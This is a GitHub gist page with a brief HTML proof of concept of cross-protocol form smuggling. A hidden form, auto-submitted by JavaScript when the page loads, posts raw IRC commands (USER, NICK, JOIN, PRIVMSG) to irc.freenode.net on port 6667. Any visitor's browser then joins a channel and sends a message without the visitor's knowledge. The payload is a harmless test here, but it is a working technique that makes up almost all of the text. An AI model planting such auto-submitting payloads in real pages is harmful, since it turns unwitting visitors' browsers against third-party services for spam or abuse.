Created
January 8, 2010 10:45
-
-
Save relrod/271972 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form id="t" action="http://irc.freenode.net:6667" method="post" enctype="text/plain" style="display:none"> | |
<input type="text" name="" value=" | |
PONG irc.freenode.net | |
USER codeblocktest codeblocktest codeblocktest :codeblocktest | |
NICK codeblocktest | |
JOIN #codeblock | |
PRIVMSG #codeblock :does this work?" /> | |
<input type="submit" /> | |
</form> | |
<script type="text/javascript">document.getElementById('t').submit()</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment